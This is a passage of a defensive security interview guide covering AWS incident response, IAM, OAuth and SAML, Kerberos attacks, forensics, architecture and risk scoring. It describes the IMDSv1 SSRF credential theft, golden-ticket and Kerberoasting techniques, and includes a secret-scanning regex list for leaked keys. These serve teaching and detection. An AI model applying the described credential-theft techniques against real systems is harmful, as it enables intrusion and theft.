Responsibility shifts by service model: IaaS (EC2): Customer owns OS, patches, firewall rules, data. PaaS (RDS, Lambda): Provider owns OS/runtime, customer owns code, data, IAM. SaaS (Office 365): Provider owns almost everything, customer owns data, access control, configuration.

Where breaches actually occur: Almost always in the customer's responsibility scope. (1) Misconfigured IAM — overprivileged roles, long-lived access keys, no MFA (Capital One 2019: SSRF + overprivileged IAM role). (2) Exposed storage — public S3 buckets, Azure blobs (hundreds of major breaches). (3) Misconfigured security groups — databases open to 0.0.0.0/0. (4) Missing encryption — data at rest unencrypted, no TLS for internal traffic. (5) Credential leaks — AWS keys in GitHub repos (automated scraping takes minutes).

Q4.2: An AWS access key is leaked on GitHub. Walk through your response.

A: Immediate (0-5 minutes): (1) Disable the access key in IAM console (don't delete — need for forensics). (2) Check if the key has an associated IAM user or role. (3) Review the user/role's attached policies to understand blast radius.

Investigation (5-60 minutes): (4) Pull CloudTrail logs filtered by the access key ID. Identify: what regions, what services, what API calls were made. Look for: CreateUser, CreateAccessKey, CreateLoginProfile (persistence), RunInstances (crypto mining), PutBucketPolicy (data exfiltration), AssumeRole (lateral movement). (5) Check for new IAM users, roles, or policies created by the compromised key. (6) Check for Lambda functions, EC2 instances, or ECS tasks launched.

Containment: (7) Revoke all sessions for the IAM user (aws iam put-user-policy with explicit deny). (8) Rotate all secrets the compromised key could have accessed. (9) Delete any persistence mechanisms (backdoor IAM users, roles, Lambda functions). (10) Review S3 access logs for data exfiltration.

Post-incident: (11) Implement SCPs preventing key creation without MFA. (12) Deploy automated secret scanning (GitHub Advanced Security, trufflehog in CI/CD). (13) Move to IAM roles with temporary credentials instead of long-lived access keys.
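
Investigation step (4) can be scripted over exported CloudTrail records. A sketch: the triage function and sample event shapes are illustrative, but the field names (eventName, awsRegion, eventSource, userIdentity.accessKeyId) follow CloudTrail's JSON record schema:

```python
# Persistence / impact API calls from investigation step (4).
SUSPICIOUS_CALLS = {
    "CreateUser", "CreateAccessKey", "CreateLoginProfile",
    "RunInstances", "PutBucketPolicy", "AssumeRole",
}

def triage(events: list[dict], leaked_key_id: str) -> dict:
    """Summarize what a leaked access key touched: regions, services,
    and any high-risk API calls, from exported CloudTrail records."""
    summary = {"regions": set(), "services": set(), "suspicious": []}
    for e in events:
        if e.get("userIdentity", {}).get("accessKeyId") != leaked_key_id:
            continue
        summary["regions"].add(e["awsRegion"])
        summary["services"].add(e["eventSource"])
        if e["eventName"] in SUSPICIOUS_CALLS:
            summary["suspicious"].append((e["eventTime"], e["eventName"]))
    return summary
```

In practice you would pull the same records with CloudTrail Lake or Athena; this is the filtering logic, not the retrieval.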

Q4.3: How do you design network isolation in AWS?

A: VPC architecture: (1) Public subnets: Only for load balancers and bastion hosts (if any). Internet Gateway attached. Resources get public IPs. (2) Private subnets: Application servers, databases. No Internet Gateway. Outbound via NAT Gateway (for updates/API calls) or VPC endpoints (preferred). (3) Isolated subnets: No outbound internet. For databases, sensitive workloads. Access only via VPC endpoints or peering.

Security groups (stateful): Instance-level firewalls. Default deny inbound. Reference other security groups instead of IP ranges (e.g., "allow port 5432 from app-sg"). No explicit deny rules — use NACLs for that.

NACLs (stateless): Subnet-level. Support allow and deny. Evaluate rules in order. Use for: blocking known bad IPs, additional subnet-level controls.

Advanced isolation: (4) VPC endpoints (Gateway for S3/DynamoDB, Interface for everything else) — traffic stays on AWS backbone, never traverses internet. (5) PrivateLink for service-to-service communication. (6) Transit Gateway for hub-and-spoke multi-VPC architecture. (7) AWS Network Firewall for stateful inspection between VPCs. (8) VPC Flow Logs to CloudWatch/S3 for network monitoring.

Zero trust overlay: Even within a VPC, use mutual TLS (mTLS) between services. Don't trust the network — authenticate every connection.

Q4.4: What are the most critical AWS IAM security controls?

A: (1) Root account lockdown: MFA (hardware key), no access keys, use only for account-level operations, monitor with CloudTrail alert. (2) Least privilege: Start with zero permissions, add only what's needed. Use IAM Access Analyzer to identify unused permissions. Use permission boundaries to cap maximum permissions. (3) Temporary credentials: IAM roles with STS AssumeRole instead of long-lived access keys. EC2 instance profiles, ECS task roles, Lambda execution roles. (4) MFA everywhere: Enforce MFA for console access and sensitive API calls (via condition keys in policies). (5) Service Control Policies (SCPs): Organization-level guardrails. Deny actions across all accounts (e.g., deny disabling CloudTrail, deny leaving organization, deny creating IAM users without MFA). (6) Cross-account access: Use roles with external IDs, not shared credentials. (7) Conditions in policies: aws:SourceIp, aws:PrincipalOrgID, aws:MultiFactorAuthPresent, aws:RequestedRegion to restrict access context. (8) Monitoring: CloudTrail + GuardDuty + IAM Access Analyzer continuous analysis.

Q4.5: Explain the IMDSv1 vs IMDSv2 difference and why it matters.

A: IMDSv1: Simple GET request to http://169.254.169.254/latest/meta-data/. Any process on the instance can access it. SSRF from web applications can reach it because it's a plain HTTP GET with no authentication.

IMDSv2: Requires a PUT request with an X-aws-ec2-metadata-token-ttl-seconds header to obtain a session token, which must then be presented in subsequent GET requests. Metadata responses default to an IP TTL (hop limit) of 1, so the token cannot be forwarded past the instance through proxies/NAT, and most SSRF payloads can only issue GET/POST.

Why it matters: Capital One breach (2019) used SSRF to hit IMDSv1 and steal IAM role credentials. IMDSv2 would have prevented this because: (1) SSRF typically sends GET, not PUT. (2) Even if PUT is achievable, the hop limit prevents token retrieval through application-level proxying. (3) Custom header requirement blocks most SSRF frameworks.

Enforcement: Set HttpTokens=required on instances to disable IMDSv1 entirely. Use SCP to enforce IMDSv2-only across the organization.


5. Identity and Access Management

Q5.1: Explain OAuth 2.0 flows. When do you use which?

A: OAuth 2.0 delegates authorization (not authentication) — the client gets a token to access resources on behalf of the user.

Authorization Code Flow (with PKCE): For server-side and mobile/SPA apps. User redirected to authorization server, authenticates, gets authorization code via redirect. App exchanges code + PKCE code verifier for access token via back-channel. Use for: All modern applications. PKCE (Proof Key for Code Exchange) prevents authorization code interception.
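
PKCE itself is a few lines of stdlib code — the verifier is random, and the challenge is the base64url-encoded SHA-256 of the verifier (the S256 method from RFC 7636). A sketch, with an illustrative function name:

```python
import base64
import hashlib
import secrets

def make_pkce_pair() -> tuple[str, str]:
    """Generate a PKCE code_verifier and its S256 code_challenge (RFC 7636)."""
    # 32 random bytes -> 43-char base64url string (allowed length: 43-128 chars).
    verifier = base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()
    # code_challenge = BASE64URL(SHA256(ASCII(code_verifier))), unpadded.
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    challenge = base64.urlsafe_b64encode(digest).rstrip(b"=").decode()
    return verifier, challenge
```

The client sends the challenge (plus code_challenge_method=S256) in the authorization request and reveals the verifier only in the back-channel token exchange, so an intercepted authorization code is useless without the verifier.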

Client Credentials Flow: Machine-to-machine. No user involved. Client authenticates directly with client_id + client_secret, gets access token. Use for: Service-to-service communication, background jobs, microservices.

Device Authorization Flow: For devices with limited input (smart TVs, CLI tools). Device displays code, user enters it on another device with full browser. Use for: IoT, CLI tools, TV apps.

Implicit Flow: DEPRECATED. Token returned directly in URL fragment. No back-channel exchange. Vulnerable to token leakage via browser history and Referer headers. Never use — replaced by Authorization Code + PKCE.

Resource Owner Password Flow: DEPRECATED. User gives username/password directly to the client. Defeats the purpose of OAuth (delegated access without sharing credentials). Only for migration from legacy systems.

Q5.2: What is the difference between OAuth and OIDC?

A: OAuth 2.0 is an authorization framework — it grants access tokens to clients to access protected resources. It does NOT define user identity or authentication.

OpenID Connect (OIDC) is an authentication layer built on top of OAuth 2.0. It adds: (1) ID Token — a JWT containing user identity claims (sub, email, name, iss, aud, exp). (2) UserInfo endpoint — returns additional user profile claims. (3) Standardized scopes (openid, profile, email). (4) Discovery — .well-known/openid-configuration endpoint for auto-configuration.

In practice: Use OIDC when you need to know WHO the user is (authentication). Use OAuth when you need to access resources on behalf of a user (authorization). Most modern implementations use both — OIDC for login, OAuth access tokens for API access.
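
A minimal sketch of the ID Token checks, stdlib-only — note that a real implementation must FIRST verify the JWT signature against the provider's JWKS; function names here are illustrative:

```python
import base64
import json
import time

def decode_jwt_payload(token: str) -> dict:
    """Decode the (unverified) payload segment of a JWT."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped base64 padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

def validate_id_token_claims(claims: dict, issuer: str, client_id: str, now=None):
    """Core OIDC claim checks: iss, aud, exp. Signature verification omitted here."""
    now = time.time() if now is None else now
    if claims["iss"] != issuer:
        raise ValueError("unexpected issuer")
    aud = claims["aud"]  # per spec, aud may be a string or a list
    if client_id not in (aud if isinstance(aud, list) else [aud]):
        raise ValueError("token not intended for this client")
    if claims["exp"] <= now:
        raise ValueError("token expired")
```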

Q5.3: Explain SAML. How does it differ from OIDC?

A: SAML 2.0 (Security Assertion Markup Language) is an XML-based SSO protocol. The Identity Provider (IdP) issues SAML assertions (XML documents) containing authentication statements, attribute statements, and authorization decision statements. Assertions are digitally signed with XML DSig.

SP-initiated flow: User visits Service Provider → SP generates AuthnRequest → Redirect to IdP → User authenticates → IdP sends SAML Response (containing signed Assertion) via POST binding to SP's ACS (Assertion Consumer Service) URL → SP validates signature, extracts attributes, creates session.

SAML vs OIDC: SAML is XML-based, verbose, primarily used in enterprise (Okta, Azure AD, ADFS). OIDC is JSON/JWT-based, lighter, used in modern web/mobile. SAML uses browser redirects and POST bindings; OIDC uses redirects and back-channel token exchange. OIDC is better for mobile/SPA (JWT is compact); SAML is better for legacy enterprise integration. Both solve SSO — OIDC is the modern choice for new implementations.

SAML vulnerabilities: XML signature wrapping attacks (moving the signed element while adding malicious content). XXE in SAML response parsing. Assertion replay if no InResponseTo validation.

Q5.4: What is the difference between RBAC and ABAC? When do you use each?

A: RBAC (Role-Based Access Control): Permissions assigned to roles, users assigned to roles. Simple, well-understood. Example: admin role has read, write, delete; viewer role has read. Works well when access patterns map cleanly to organizational roles.

ABAC (Attribute-Based Access Control): Access decisions based on attributes of the subject (user department, clearance), resource (classification, owner), action, and environment (time, location, device posture). Policies are rules: "Allow if user.department == resource.department AND user.clearance >= resource.classification AND time.hour BETWEEN 9 AND 17."

When RBAC breaks down: Role explosion — when you need "editor-for-project-A-in-region-US" and similar fine-grained combinations, you end up with thousands of roles. Cross-cutting concerns (time-based access, location restrictions) don't map to roles.

When to use which: RBAC for straightforward organizational hierarchies with clear role boundaries. ABAC when you need context-dependent, fine-grained access decisions. Most mature systems use both: RBAC for coarse-grained access + ABAC for fine-grained policy evaluation. AWS IAM is essentially ABAC — policies evaluate conditions on request attributes.
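
The example rule above translates almost one-to-one into code. A toy evaluator, assuming clearance and classification are ordered integers:

```python
from dataclasses import dataclass

@dataclass
class User:
    department: str
    clearance: int       # e.g. 1=public ... 4=secret

@dataclass
class Resource:
    department: str
    classification: int

def abac_allow(user: User, resource: Resource, hour: int) -> bool:
    """Evaluate the example policy from the text: same department,
    sufficient clearance, and access during business hours."""
    return (user.department == resource.department
            and user.clearance >= resource.classification
            and 9 <= hour <= 17)
```

Adding a new constraint (device posture, resource owner) is a new attribute and a new clause — no role explosion.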

Q5.5: Explain Kerberos authentication. What are golden and silver ticket attacks?

A: Kerberos flow: (1) User authenticates to KDC (Key Distribution Center) with password → receives TGT (Ticket Granting Ticket) encrypted with krbtgt account hash. (2) User presents TGT to KDC to request service ticket (TGS) for specific service → KDC issues TGS encrypted with service account hash. (3) User presents TGS to service → service decrypts with its own hash, grants access.

Golden Ticket: Attacker obtains the krbtgt account's NTLM hash (via DCSync or domain controller compromise). Can forge TGTs for any user, including non-existent users, with any group membership, with any lifetime. Provides unrestricted access to the entire domain. Detection: Monitor for TGTs with abnormally long lifetimes, tickets for non-existent users, Kerberos authentication anomalies. Remediation: Reset the krbtgt password TWICE, allowing replication to complete between resets — the KDC accepts tickets encrypted with both the current and previous key, so a single reset leaves forged tickets valid.

Silver Ticket: Attacker obtains a service account's NTLM hash. Can forge TGS tickets for that specific service. More targeted than golden tickets — only accesses the compromised service. Harder to detect because no KDC interaction (forged ticket goes directly to service). Detection: Monitor for Kerberos authentication without corresponding TGT request (Event ID 4769 without preceding 4768).

Kerberoasting: Request TGS for services with SPNs registered to user accounts, crack the ticket offline (encrypted with service account's password hash). Targets weak service account passwords. Mitigation: Long, random service account passwords (30+ chars), managed service accounts (gMSA), monitoring for bulk TGS requests.

Q5.6: What is Zero Trust? How do you actually implement it?

A: Zero Trust is a security model that eliminates implicit trust based on network location. Core principles: (1) Never trust, always verify. (2) Assume breach. (3) Verify explicitly — authenticate and authorize every request. (4) Least privilege access. (5) Microsegmentation.

Implementation pillars:

Identity: Strong authentication (MFA, phishing-resistant like FIDO2), continuous validation, device posture assessment. Every access request authenticated regardless of network location.

Network: Microsegmentation — every workload has its own security perimeter. mTLS between services. Software-defined perimeter (SDP) / BeyondCorp model — no network-level access until authenticated and authorized.

Device: Device health attestation, certificate-based identity, EDR compliance checks. Unmanaged devices get restricted access.

Application: Per-request authorization (not just per-session). Context-aware policies (user identity + device health + location + time + resource sensitivity). API gateway enforcement.

Data: Classification, encryption (at rest, in transit, in use), DLP controls, access logging.

Visibility: Continuous monitoring, SIEM/SOAR integration, behavioral analytics, anomaly detection.

Real implementations: Google BeyondCorp, Microsoft Zero Trust Architecture, NIST SP 800-207. Key technology components: Identity-Aware Proxy (IAP), policy engine + policy administrator + policy enforcement point architecture.


6. Incident Response

Q6.1: Walk through the NIST incident response lifecycle.

A: NIST SP 800-61 defines four phases:

1. Preparation: Build IR team (CSIRT), define roles and communication channels. Establish relationships with legal, PR, law enforcement. Deploy detection tools (SIEM, EDR, NDR). Create playbooks for common incident types. Conduct tabletop exercises. Maintain jump bag (forensic tools, documentation, contact lists). Define severity classification criteria.

2. Detection and Analysis: Identify incidents from alerts (SIEM, EDR, user reports, threat intel). Triage: determine if it's a true positive and assess scope. Establish timeline — build event chronology. Classify severity. Document everything from the first moment. Correlate indicators across sources. Initial scoping: how many systems, what data, what access.

3. Containment, Eradication, Recovery: Containment — short-term (isolate affected systems from network, disable compromised accounts) and long-term (apply patches, change credentials, implement additional monitoring). Evidence preservation BEFORE eradication — forensic images, memory dumps, log collection. Eradication — remove attacker presence (malware, backdoors, persistence mechanisms), patch entry vector. Recovery — restore from known-good backups, rebuild compromised systems, verify integrity. Monitor closely for re-compromise.

4. Post-Incident Activity: Blameless post-mortem within 1-2 weeks. Root cause analysis. Timeline documentation. Lessons learned — what worked, what didn't. Update playbooks, detection rules, and controls. Track remediation items to completion.

Q6.2: You discover a compromised Linux server. What is your first 30 minutes?

A: First priority: preserve volatile evidence before it's lost.

Minutes 0-5 (triage): (1) Do NOT reboot or shut down. (2) Note current time and timezone offset. (3) Document your actions from this point forward. (4) Assess blast radius — what does this server have access to?

Minutes 5-15 (volatile evidence collection): (5) Memory dump: AVML or the LiME kernel module for full memory acquisition. (6) Running processes: ps auxf, /proc/[pid]/exe, /proc/[pid]/cmdline, /proc/[pid]/maps. (7) Network connections: ss -tunap or netstat -tunap (active C2 connections). (8) Open files: lsof. (9) Logged-in users: w, who, last. (10) Environment variables, loaded kernel modules (lsmod).

Minutes 15-25 (containment + non-volatile evidence): (11) Network containment — isolate via firewall rule, VLAN change, or security group modification (don't unplug — maintains connections for investigation). (12) Disk image: dd or dcfldd to create forensic image. (13) Collect logs: /var/log/auth.log, /var/log/syslog, /var/log/secure, application logs, audit logs (/var/log/audit/audit.log). (14) Cron jobs: /etc/crontab, /var/spool/cron/, /etc/cron.d/. (15) Startup scripts: systemd units, init.d scripts, rc.local.

Minutes 25-30 (initial analysis): (16) Check for persistence: new users in /etc/passwd, authorized_keys modifications, unusual SUID binaries (find / -perm -4000), modified system binaries. (17) Check bash history for all users. (18) Timeline analysis: file modification times around suspected compromise time. (19) Report initial findings and recommended next steps.

Q6.3: What is chain of custody and why does it matter?

A: Chain of custody is the documented chronological history of evidence — who collected it, when, how, where it was stored, and who had access to it at every point.

Why it matters: (1) Legal admissibility — evidence without proper chain of custody may be inadmissible in court. (2) Integrity assurance — proves evidence hasn't been tampered with. (3) Accountability — clear record of who handled evidence and when.

Practical implementation: (1) Hash everything at collection time (SHA-256 of forensic images, memory dumps, log files). (2) Document: collector name, date/time, method of collection, tool versions, storage location, purpose. (3) Use write blockers for disk forensics. (4) Store evidence in tamper-evident containers/locations. (5) Log every access to evidence. (6) Transfer evidence with signed receipts. (7) Maintain evidence log spreadsheet or evidence management system.

Digital evidence specifics: Forensic images verified with hash comparison. Memory dumps timestamped and hashed. Live response output captured to write-once media when possible. Screenshots of volatile data with timestamps.
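
The hash-at-collection step might look like this sketch — field names and the log filename are illustrative, not a legal standard:

```python
import datetime
import hashlib
import json
import pathlib

def record_evidence(path: str, collector: str, method: str) -> dict:
    """Hash an evidence file at collection time and append a custody log entry."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        # Stream in 1 MiB chunks so large forensic images don't exhaust memory.
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    entry = {
        "file": str(pathlib.Path(path).resolve()),
        "sha256": h.hexdigest(),
        "collector": collector,
        "method": method,
        "collected_at_utc": datetime.datetime.now(datetime.timezone.utc).isoformat(),
    }
    # Append-only log; re-hash the file later to demonstrate integrity.
    with open("custody_log.jsonl", "a") as log:
        log.write(json.dumps(entry) + "\n")
    return entry
```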

Q6.4: How do you determine the scope and blast radius of a compromise?

A: Start from the known compromised point and work outward:

(1) Credential scope: What accounts were accessible from the compromised system? Service account credentials, SSH keys, API tokens, database passwords. Assume all accessible credentials are compromised. Check credential usage in authentication logs across the environment.

(2) Network scope: What systems could the compromised host reach? Firewall/security group rules, network flow data, VPN access. Check IDS/IPS alerts, proxy logs, DNS logs for lateral movement indicators.

(3) Data scope: What data was accessible? Database contents, file shares, cloud storage. Check data access logs (S3 access logs, database query logs) for exfiltration indicators.

(4) Temporal scope: When did the compromise start? Work backward from detection to initial access. Check: creation time of backdoors, first C2 connection, first unauthorized access in logs. This determines the window of exposure.

(5) Pivot analysis: From each compromised system, repeat the analysis. Build a graph of compromised systems and credentials. Use EDR telemetry, authentication logs (Windows Event IDs 4624/4625, Linux auth.log), and network flow data to trace lateral movement.

(6) Indicators of compromise (IOCs): Extract IOCs from known-compromised systems (file hashes, IPs, domains, mutexes, registry keys) and hunt across the entire environment.

Q6.5: When do you involve law enforcement, legal, and external parties?

A: Legal (immediately): Involve legal counsel as soon as an incident is confirmed. They advise on: notification requirements (GDPR 72-hour rule, state breach notification laws), evidence preservation obligations (litigation hold), privilege considerations (attorney-client privilege on IR communications), regulatory reporting requirements.

Law enforcement (depends): Involve when: nation-state actor suspected, significant financial loss, threat to public safety, regulatory requirement. FBI/CISA for US-based incidents. Consider that law enforcement involvement may become public, may slow response due to evidence requirements, and they may seize equipment.

External IR firm (when): When you lack internal forensic capability, when scope exceeds team capacity, when independent investigation is required (insider threat involving security team), when legal requires third-party validation.

Insurance/broker: Notify cyber insurance carrier early — most policies have notification windows and approved vendor panels.

Regulators: GDPR (72 hours to supervisory authority if personal data breach), HIPAA (60 days to HHS for breaches affecting 500+ individuals), PCI DSS (immediately to acquirer and card brands), SEC (4 business days for material cybersecurity incidents via Form 8-K for public companies).

Customers/public: Per legal advice and regulatory requirements. Prepare communications in advance. Be transparent about what happened, what data was affected, and what you're doing about it.


7. Security Architecture

Q7.1: Explain defense in depth. Give a concrete example.

A: Defense in depth layers multiple independent security controls so that failure of one control doesn't result in complete compromise. Each layer assumes the previous layer has failed.

Concrete example — protecting a web application:

Layer 1 (Network perimeter): DDoS protection (Cloudflare, AWS Shield), WAF rules (OWASP CRS), rate limiting.

Layer 2 (Network segmentation): Web servers in DMZ, app servers in private subnet, database in isolated subnet. Security groups restrict traffic to only required ports between tiers.

Layer 3 (Application): Input validation, parameterized queries, output encoding, CSP headers, CSRF tokens, authentication/authorization enforcement.

Layer 4 (Data): Encryption at rest (AES-256-GCM), encryption in transit (TLS 1.3), field-level encryption for PII, database access logging.

Layer 5 (Endpoint): OS hardening (CIS benchmarks), EDR agent, host-based firewall, immutable infrastructure (containers rebuilt, not patched).

Layer 6 (Identity): MFA for all access, short-lived credentials, just-in-time access for admin operations, PAM (Privileged Access Management).

Layer 7 (Detection/Response): SIEM correlation, anomaly detection, automated alerting, incident response playbooks, forensic readiness.

Key principle: Each layer must be independently effective. If the WAF is bypassed, the application's input validation catches the attack. If application code has a bug, database permissions limit damage. If database is breached, encryption limits data exposure.

Q7.2: How do you design for blast radius containment?

A: Blast radius = the maximum impact of a single failure or compromise. Design goal: ensure that compromising one component cannot lead to compromising the entire system.

Techniques: (1) Microsegmentation: Each service/workload in its own network segment with firewall rules allowing only required communication. Compromising service A should not grant network access to service B unless A legitimately calls B.

(2) Least privilege: Every identity (user, service account, role) has minimum required permissions. Use permission boundaries. Avoid wildcard permissions (*). Separate read and write roles.

(3) Isolation boundaries: Separate AWS accounts per environment (dev/staging/prod) and per security domain (security tooling account, log archive account, network account). Use SCPs to enforce guardrails per account.

(4) Credential isolation: Each service has its own credentials (no shared service accounts). Credentials scoped to minimum required resources. Rotate automatically. No long-lived credentials.

(5) Data compartmentalization: Different encryption keys per data classification level, per tenant, per region. Key compromise exposes only data encrypted with that key.

(6) Failure domains: Distribute across availability zones/regions. Circuit breaker patterns prevent cascading failures. Bulkhead patterns isolate resource pools.

(7) Break-glass procedures: Emergency access that bypasses normal controls but generates high-fidelity alerts and requires post-hoc review.

Q7.3: Design a secure multi-tenant SaaS architecture.

A: Data isolation models:

  • Silo model: Separate database per tenant. Strongest isolation. Highest cost. Used for highly regulated tenants.
  • Bridge model: Shared database, separate schemas per tenant. Good isolation with lower cost.
  • Pool model: Shared tables with tenant_id column. Cheapest. Weakest isolation. Requires rigorous row-level security.

Recommended approach for most cases: Pool model with defense in depth:

Application layer: (1) Tenant context injected at authentication and propagated through all layers. (2) All database queries automatically scoped by tenant_id (ORM middleware, PostgreSQL Row Level Security policies). (3) API authorization checks verify resource belongs to requesting tenant. (4) Never expose internal IDs — use UUIDs to prevent enumeration.

Data layer: (5) Row-level security (RLS) in PostgreSQL as database-level enforcement. (6) Separate encryption keys per tenant (envelope encryption: tenant DEK wrapped with KEK in KMS). (7) Audit logging includes tenant_id for all operations.
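
The database-level enforcement in (5) might be sketched as follows in PostgreSQL — table, column, and setting names are hypothetical:

```sql
-- Illustrative PostgreSQL RLS: every query against `documents` is
-- transparently filtered to the tenant the application has set.
ALTER TABLE documents ENABLE ROW LEVEL SECURITY;
ALTER TABLE documents FORCE ROW LEVEL SECURITY;   -- apply to the table owner too

CREATE POLICY tenant_isolation ON documents
    USING (tenant_id = current_setting('app.current_tenant')::uuid);

-- Per transaction, the application runs:
--   SET LOCAL app.current_tenant = '<tenant-uuid>';
-- A query that forgets its WHERE tenant_id clause now returns nothing
-- instead of leaking other tenants' rows.
```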

Infrastructure: (8) Compute isolation for noisy-neighbor protection (dedicated pods per high-tier tenant). (9) Rate limiting per tenant. (10) Separate egress paths if compliance requires.

Testing: Regularly test cross-tenant access — automated tests that verify tenant A cannot access tenant B's data through any API endpoint.

Q7.4: What is a threat model? Walk through the process.

A: Threat modeling systematically identifies and prioritizes threats to a system. Do it during design, revisit when architecture changes.

Process (STRIDE-per-element):

Step 1: Model the system. Create a Data Flow Diagram (DFD) showing: external entities (users, third-party services), processes (application components), data stores (databases, caches), data flows (API calls, file transfers), and trust boundaries (network perimeter, authentication boundary, privilege boundary).

Step 2: Identify threats. For each element in the DFD, apply STRIDE:

  • Spoofing (identity): Can an attacker impersonate a legitimate entity? Applies to external entities and processes.
  • Tampering (integrity): Can data be modified in transit or at rest? Applies to data flows and data stores.
  • Repudiation (non-repudiation): Can a user deny performing an action? Applies to external entities and processes.
  • Information Disclosure (confidentiality): Can unauthorized parties access data? Applies to data flows, data stores, and processes.
  • Denial of Service (availability): Can the component be overwhelmed? Applies to processes and data stores.
  • Elevation of Privilege (authorization): Can an attacker gain higher privileges? Applies to processes.
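
The per-element applicability above can be encoded as a lookup, useful for generating a threat checklist straight from a DFD — element-type names are illustrative:

```python
# STRIDE categories applicable to each DFD element type, per the
# STRIDE-per-element mapping listed above.
STRIDE_PER_ELEMENT = {
    "external_entity": {"Spoofing", "Repudiation"},
    "process": {"Spoofing", "Repudiation", "Information Disclosure",
                "Denial of Service", "Elevation of Privilege"},
    "data_flow": {"Tampering", "Information Disclosure"},
    "data_store": {"Tampering", "Information Disclosure", "Denial of Service"},
}

def enumerate_threats(elements: dict) -> dict:
    """Map each named DFD element to the threat categories to consider.

    `elements` maps element name -> element type, e.g. {"api": "process"}.
    """
    return {name: STRIDE_PER_ELEMENT[etype] for name, etype in elements.items()}
```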

Step 3: Rate and prioritize. Use DREAD (Damage, Reproducibility, Exploitability, Affected users, Discoverability) scores 1-10, or CVSS-style rating, or simple High/Medium/Low based on likelihood × impact.

Step 4: Mitigate. For each threat: accept, mitigate (implement control), transfer (insurance, SLA), or eliminate (remove the feature). Document the decision.

Step 5: Validate. Verify mitigations are implemented. Test them. Penetration test against identified threats. Update model as system evolves.

Q7.5: How do you secure a CI/CD pipeline?

A: CI/CD pipelines are high-value targets — they have write access to production and often run with elevated privileges.

Source control: (1) Signed commits (GPG/SSH signatures). (2) Branch protection rules — require PR reviews, no direct pushes to main. (3) CODEOWNERS for security-sensitive files. (4) Pre-commit hooks for secrets scanning.
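
The pre-commit secrets check in (4) reduces to pattern matching. A toy sketch — the patterns are illustrative; production scanners (gitleaks, detect-secrets) ship far larger, tuned rule sets:

```python
import re

# Illustrative patterns only — real rule sets cover hundreds of credential formats.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_header": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    "generic_api_key": re.compile(
        r"(?i)\b(?:api|secret)[_-]?key\s*[:=]\s*['\"][A-Za-z0-9/+=]{20,}['\"]"),
}

def scan_text(text: str) -> list:
    """Return (line_number, rule_name) for every suspected secret in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                findings.append((lineno, name))
    return findings
```

Wired into a pre-commit hook, a non-empty findings list blocks the commit before the secret ever reaches the repository history.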

Build: (5) Hardened, ephemeral build agents — containers destroyed after each build. (6) Pin dependencies by hash (not version). (7) Dependency scanning (SCA) in build pipeline. (8) SAST scanning. (9) Container image scanning (Trivy, Grype). (10) Build provenance — SLSA framework (Supply-chain Levels for Software Artifacts). Generate signed build attestations.

Secrets management: (11) No secrets in code or CI config files. Use secrets managers (Vault, AWS Secrets Manager) with short-lived, per-build credentials. (12) Least privilege for pipeline service accounts. (13) Separate secrets per environment.

Deployment: (14) Infrastructure as Code reviewed like application code. (15) Immutable deployments (replace, don't patch). (16) Canary/blue-green deployments with automatic rollback. (17) Deployment requires approval for production.

Runtime: (18) Container runtime security (read-only root filesystem, no privileged containers, Seccomp/AppArmor profiles). (19) Network policies restricting pod-to-pod communication.

Monitoring: (20) Audit logs for all pipeline activities. (21) Alert on: unexpected pipeline executions, pipeline config changes, new service accounts, deploys outside business hours.


8. Risk Management

Q8.1: Explain the FAIR model. How does it differ from qualitative risk assessment?

A: FAIR (Factor Analysis of Information Risk) is a quantitative risk model that expresses risk in financial terms (dollars of expected loss).

Components: Risk = Loss Event Frequency × Loss Magnitude.

  • Loss Event Frequency = Threat Event Frequency × Vulnerability (probability that a threat event becomes a loss event).
  • Threat Event Frequency = Contact Frequency × Probability of Action.
  • Loss Magnitude = Primary Loss (direct costs: response, replacement, fines) + Secondary Loss (reputation damage, customer churn, legal costs).

How it differs from qualitative: Qualitative (High/Medium/Low) is subjective, inconsistent between assessors, and doesn't enable comparison of fundamentally different risks (how do you compare "High" data breach risk vs "Medium" DDoS risk for investment prioritization?). FAIR produces dollar ranges (Monte Carlo simulation): "90% confidence this risk results in $500K-$2M annual loss" — enabling rational investment decisions.

When to use FAIR: Communicating with executives and boards (they understand dollars, not heat maps). Justifying security investments. Comparing risk reduction options. Insurance decisions. When qualitative is OK: Initial triage, rapid risk assessment during threat modeling, when data for quantitative analysis isn't available.
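
The Monte Carlo step can be sketched with the stdlib — every distribution below is a made-up illustration, not a calibrated estimate:

```python
import random

def fair_simulation(n: int = 100_000, seed: int = 42) -> tuple:
    """Toy FAIR-style Monte Carlo returning a (5th, 95th) percentile loss range."""
    rng = random.Random(seed)
    losses = []
    for _ in range(n):
        # Loss Event Frequency = Threat Event Frequency x Vulnerability.
        tef = rng.uniform(2, 12)          # threat events / year (illustrative)
        vuln = rng.uniform(0.05, 0.25)    # P(threat event becomes loss event)
        lef = tef * vuln
        # Loss Magnitude per event: lognormal, ~$100K median (illustrative).
        magnitude = rng.lognormvariate(mu=11.5, sigma=0.8)
        losses.append(lef * magnitude)    # annualized loss exposure for this trial
    losses.sort()
    return losses[int(0.05 * n)], losses[int(0.95 * n)]
```

The returned pair is the 5th/95th percentile of simulated annualized loss — the "90% confidence" dollar range quoted to executives.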

Q8.2: Explain CVSS scoring. What are its limitations?

A: CVSS (Common Vulnerability Scoring System) rates vulnerability severity 0-10. Current version: CVSS 4.0.

Base metrics (CVSS 3.1, still the most widely published): Attack Vector (Network/Adjacent/Local/Physical), Attack Complexity (Low/High), Privileges Required (None/Low/High), User Interaction (None/Required), Scope (Changed/Unchanged), Impact on Confidentiality/Integrity/Availability (High/Low/None). CVSS 4.0 drops Scope, adds Attack Requirements, and splits impact into Vulnerable System and Subsequent System metrics.

Example: Log4Shell (CVE-2021-44228) = CVSS 10.0 — AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H. Remote, no auth, no interaction, scope change, full CIA impact.

Temporal metrics: Exploit Code Maturity, Remediation Level, Report Confidence. Adjusts score based on current exploit availability and patch status.

